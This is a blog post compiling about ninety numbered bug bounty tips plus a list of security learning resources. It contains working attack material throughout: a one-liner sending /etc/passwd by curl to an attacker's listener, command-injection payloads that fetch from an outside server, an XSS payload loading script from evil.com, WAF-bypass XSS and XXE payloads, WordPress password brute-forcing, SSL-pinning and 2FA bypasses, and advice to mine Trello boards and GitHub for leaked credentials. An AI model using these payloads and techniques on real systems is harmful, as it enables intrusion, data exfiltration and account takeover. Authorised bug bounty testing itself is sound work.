Collection of Bug Bounty Tip-Will Be Updated Daily - Bbinfosec - Medium
Collection of Bug Bounty Tip-Will Be Updated Daily - Bbinfosec - Medium
Bbinfosec
Jan 29 · 12 min read
Whenever i see for bug bounty tips and tricks i wish to make it up a note , The following
were the bug bounty tips o ered by experts at twitter ,slack,what sapp,discord etc.
Original credits goes to respective authors ,I just collected it and listed here as one stop
reference ,For authors please verify #bugbountytip on twitter.
Recon Map :
The following recon map i found on twitter which is very interesting, Use it wise.
Recon map 1
Some Mindmap
Work ow
https://github.com/arkadiyt/bounty-targets-data
List of tips :
Tips & Tricks :
3)If you got ‘Subdomain Takeover’ don’t report it yet, look at the main site/app for gain
privileges: like a potential CSP policy bypass (or session hijacking via Set-cookie:
*.domain.com
5)Look for port 9200{elastic search) and nd juicy stu ,Use shodan.io using org:”org
name”query
7)Search for public Trello boards of companies, to nd login credentials, API keys, etc.
or if you aren’t lucky enough, then you may nd companies’ Team Boards sometimes
with tasks to x security vulnerabilities
8)remember that Github is your friend — Check dot les of company’s employees —
Search for DevOps projects shared (fork) between employees (ansible, Cassandra,
Azure,..) => you get Login credential, API key, Private keys — Always follow the
manual approach
10)Blind RCE — Grabs /etc/passwd and dumps it to your netcat listener via POST `cat
/etc/passwd | curl -X POST -d @- http://yourip:yourport/`
13)If the target is using @Cloud are , dig in their DNS records and search for the
origins IP address. If you attack the application directly by his IP’s cloud are WAF will
not be there :)
14)Look for developers of the organisation (Linkedin, http://hunter.io , ..) and use their
name in github. Look for repositories which are public but shouldn’t be.
18)Uploading le with .url might result in XSS :) Chrome doesn’t support it yet but
works like a charm with FOX
19)Sometimes you nd those PATHs that forwards to a login page & you can’t see the
content inside them. (ex: /path/to/secret → Google login) Take all these PATHs,
prepend /public/ to all of them as: /public/path/to/secret , got access to a Jenkins
instance.. [1]
20)if server only allows GET and POST method, then try adding “X-HTTP-Method -
Override: PUT to achieve RCE via PUT method
21)Found an endpoint which is doing something with images? Give this a shot >
request=input&&id , request=input|id , request=input`id` or you can even setup a NC
& try request=input&&http://wgetyourserver.com :port & so on.
23)if a website does not verify email, try signing up with <whatev>@domain.com (the
company email). Sometimes this gives you higher privilege like deleting/viewing any
other user’s pro les etc.
27)See an API Endpoint displaying senstive data?Add a jsonp or callback parameter and
try to leak it using XSS
31)Xss on s3 buckets alerts on s3 domain, it’s a low priority bug. Better nd a re ected
xss on main domain and iframe it on s3 xss. You can get an account takeover
34)You can turn an input box into automatic XSS by setting agnostic payload on the
“onfocus” attribute and then setting it to “autofocus”. Eg: <input onfocus=”alert(0);”
autofocus> This will result in automatic XSS (no user interaction).
35)In case you wanted to test an SSRF but don’t own a vps and burp collaborator is
blocked you can use this https://canarytokens.org/generate #bugbounty
36)Change the User-Agent to your blind XSS payload and traverse the site. Like visiting
site links, lling some forms etc. Sometimes blind XSS may red if you are lucky enough
37)When the le protocol handler doesn’t work, sometimes Netdoc can be your friend.
Just saying :)
38)Encountered with AWS WAF? Just add “<!” (without quotes) before your payload
and bypass that WAF. :) eg: <!<script>alert(1)</script>
39)There’s a good chance to catch #Modi ed, #Incomplete or even #Broken endpoints
in the lower environments such #qa #uat #dev #dr #staging #stage #test #sandbox
#www2 Sub-domains.
41)If website has CSRF token or any secret key on response try CORS Misconguration
issue. You can steal secret tokens
43)Collect subdomains with regexp BurpPro -> search -> type (\w+)?
\.?http://domain.com Regexp: (\w+)?\.?http://domain.com Try and you collect with
subdomains very interesting endpoints.
44)In a cloud test if you nd a .cspkg le its a gold mine, its a zip le with all the
compiled code and con g les.
47) And analyze apps in both way (Statically and Dynamically) to increase a bugs
triggering chances.
49)If you get a shell on a machine with ~/.aws/credentials further esculate to the
actual bucket or ec2 instances. Commands: aws s3 ls s3://XXX/directory/ — pro le
username and aws ec2 describe-instances — pro le username.
50)nmap — script “http-*” IP/target — Will run 30+ scripts related to http. Everything
from sqli injection to con g backups checkout more at the docs
51)Always do directory Brute forcing on all sub-domain even on 403 page. Sometimes
you will get .git le and you can download whole web application source code.
52)Deserializing is really e ective. Never take for granted the lack of industry standards
implemented into hashes and other encrypted strings uses by web applications.
55)Found a company running an open source system and cannot nd a CVE for it?
Download and setup the open source system yourself and see where you mess up. Best
chances are you will nd some common easy-to-miss miscon g that the admin made
56)When injecting into src attributes, you need a javascript URI payload! Here is a good
payload I created using a load of linefeeds to bypass WAF:
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0) Work with
link + iframe.
57)Many sites log in with the user after they reset the password through some token, in
some cases you can bypass 2FA only by resetting your password, if you are lucky, after
that your account will be logged in without needing to con rm anything else.
59)Always look for any parameters re ecting in the javascript functions like in a
variable. If there is no url encoding of characters like ; ) } you can close that function to
insert your malicious javascript Ex. ;)}alert(1)/
60)via burpsuite search to nd some open redirect , search “=http” or “=aHR0” base64
encode http from “Request header” and status code 30X you also can use this tip to nd
some SSRF.
61)To get an error page or stack trace in ASP based application you can try below
directories — 1. /con/ 2. /aux/ 3. con.aspx 4. aux.aspx
62)Sometimes user input is re ected into a value without any quotations. Eg:<input
value={input}> Just add a space and you can now inject onfocus=alert(0) autofocus
for XSS! Works even against htmlspecialchars().
63)To nd vuln domains & subdomains that is currently pointed to GitHub due to
misconf. Try searching the syntax on publicwww. “There isn’t a Github Pages site
here” It will return thousands of pages containing domains & subdomains that could be
vuln to Takeover.
65)Add to scope all your target subdomains on @Burp_Suite “Target” tab >>
“Scope” >> “Use advanced scope control” checkbox >> “Add” button >> Set
Protocol: Any — Host/IP range: .*\.domain\.com$ >>
66) Some AEM instances may respond di erently to di erent browsers. e.g.
https://website/apps/..tidy.3....json/t.js on Chrome will give HTTP 200 whereas
Firefox will return HTTP 404.
67)Port 50070 hadoop No authentication Access to logs and read write access to
directories
68) Hunting For Endpoints while Bughunting developer options Could Be handy for u
press ctrl+shift+j click on network and reload the page , few endpoints ,url’s and also u
can nd subdomain too.
69) An example of why monitoring SSL certs up to date is important: I got a list of
unique subdomains for a company last week from March dataset. Now, when compared
to May dataset, May had an addition of 2,000 UNIQUE subdomains. Your recon is not
good if not updated.
70) Need to copy terminal output to the clipboard on X11? install xclip: apt-get install
xclip setup bash alias: alias xclip=’xclip -selection c’ pro t: egrep ‘interesting’ <corpus>
| xclip (OSX? see pbcopy/pbpaste!)
71) Have you ever come across a Grafana instance while doing recon? Sometimes you
can bypass company SSO (when only login is shown) by going directly to “/signup” and
registering with your own credentials (or try default admin:admin).
72) f you nd a Google Maps API Key , try to use it here :
https://developers.google.com/maps/documentation/maps-static/intro … . This could
lead to nancial losses for a company.
73) Always try to throw a quick % in search elds and so on as well :). It may end up in a
LIKE statement and return all :)
74) Disable Android SSL pinning using Objection+Frida pip3 install -U objection
(Download frida-server, push to /data/local/tmp on rooted device and start it using adb
shell.) objection — gadget “http://com.target.app ” explore android sslpinning disable
76) If you want to put spaces in a cmd: #<!ENTITY xxe SYSTEM “expect://ls$IFS-
la$IFS/”>]>
77) Captcha bypass: -The Captcha generated based on a given MD5 string — Wrote a
bot to randomly generate MD5 of 6 characters string and use it as Captcha to login !
78) Bypass Custom Firewall with URL encoding technique: Final Payload:
%253%63svg%2520onload=alert(1)%253%65 the rewall was blocking “%253c”,
Trick: %25 3 %63 -> when the app decoded it, it become %3c -> app decoded it again
and it become < and get alert
79) Have a char limit for XSS? See if it’s appended with other elds ( rst + last name).
You can then split the payloads (this case needed JQuery to load ext script): FirstName:
“><svg/onload=“$.getScript(‘http://‘+ LastName: ‘http://evil.com ’)
80) Want to automate user enumeration of wordpress sites on all subdomains and then
bruteforce identifed users? read le; amass enum -o subdomains.txt -d $file; cat
subdomains.txt | while read url; do wpscan — url https://”$url” -P passwords.txt -t 50 -
o output/”$url”.txt;
81) OneLiner extracts all API endpoints from AngularJS & Angular javascript les:
curl -s URL | grep -Po “(\/)((?:[a-zA-Z\-_\:\.0–9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0–9\
{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0–9\{\}]+))” | sort -u
85) Test SQLi + XSS + SSTI with the same payload use
SQLI+XSS+SSTI
Open Redirect + Micon gured OAuth App => OAuth Token Stealing
87) “site:*.domain.com ext:html” is a good Google dork for nding old, no longer linked
static HTML pages that might contain buggy JS that could lead to XSS
payload 2: <select><noembed></select><script
x=’a@b’a>y=’a@b’//a@b%0a\u0061lert(1)</script x>
payload 3:
<a+HREF=’%26%237javascrip%26%239t:alert%26lpar;document.domain)’>
89)If you are testing access to S3 buckets and do not want to con gure credentials for
testing use — no-sign-request. ‘aws s3 command S3://bucket/ le — no-sign-request’
90) you can use this tool to dynamically generate your own security (XSS,SQLI,email-
format,etc,) payloads for fuzz testing: (link: https://gitlab.com/akihe/radamsa)
gitlab.com/akihe/radamsa example: echo “<script>alert(1)</script>” | radamsa -n 5
— patterns od
92)Access the site without loging into account you will get some hidden endpoints
which are overlooked by others.
93)Forget the subdomains for recon! go directly for the ASN & hit the network-range
organization: A new world arises without waf’s, a lot of messy SSL certs, unprotected
hosts & private hidden.
94) If your target requires phone number veri cation and you need more accounts, you
can just buy a really cheap prepaid SIM card, and without topping it up, you can recieve
the veri cation codes in SMS!
Will be updated..!
Some other resources which will help you to groom further as below :
rinetd/BurpSuite-1
BurpSuite using the document and some extensions. Contribute to
rinetd/BurpSuite-1 development by creating an account…
github.com
Hackfest.ca
DEFCON
BugCrowd
HackerOne
Peter Yaworski
Books
Web Hacking 101
The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws
PoC or GTFO
OWASP
The Open Web Application Security Project aims to improve software security by
providing guidelines and learning resources.
Top 10
Miscellaneous references
Online sandbox
Backdoor
Pwnable
RingZer0
RingZer0
Virtual machines
Exploit Exercices
Vulnhub
WebGoat
NodeGoat
Security Shepherd
Hackademic challenges
Black.Room Security
CAPTF
Conference Talks:
https://infocon.org/
Youtube Talk :
bugbountytip.com
blaCCkHatHacEEkr/PENTESTING-BIBLE
Leran Ethical Hacking and penetration testing .hundreds of ethical hacking
& penetration testing & red team…
github.com
0xInfection/Awesome-WAF
Everything awesome about web-application rewalls (WAF). -
0xInfection/Awesome-WAF
github.com
No rights
reserved by the author.
658 claps
WRITTEN BY
Bbinfosec
Just another guy whom loves to play around 0 and 1
Follow
AboutHelpLegal